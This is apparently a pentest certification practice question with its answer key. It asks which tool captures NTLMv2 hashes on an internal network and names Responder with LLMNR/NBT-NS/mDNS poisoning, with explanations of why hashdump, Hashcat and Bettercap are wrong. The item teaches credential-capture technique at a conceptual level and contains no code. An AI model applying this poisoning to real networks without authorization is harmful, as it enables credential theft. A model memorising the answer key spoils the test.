A penetration tester is conducting an internal network assessment and wants to capture NTLMv2 hashes from Windows hosts without sending any authentication traffic. Which tool and attack technique should the tester use?
Trap 1: Metasploit's hashdump module
hashdump requires prior administrative access to a compromised system.
Trap 2: Hashcat with a wordlist attack
Hashcat cracks hashes; it does not capture them.
Trap 3: Bettercap with ARP spoofing
ARP spoofing is for MITM but does not specifically capture NTLM hashes; it can redirect traffic but not passively capture hashes without authentication.
- A
Responder with LLMNR/NBT-NS/mDNS poisoning
Responder listens for LLMNR/NBT-NS/mDNS queries and responds falsely, causing victims to send NTLMv2 hashes.
- B
Metasploit's hashdump module
Why wrong: hashdump requires prior administrative access to a compromised system.
- C
Hashcat with a wordlist attack
Why wrong: Hashcat cracks hashes; it does not capture them.
- D
Bettercap with ARP spoofing
Why wrong: ARP spoofing is for MITM but does not specifically capture NTLM hashes; it can redirect traffic but not passively capture hashes without authentication.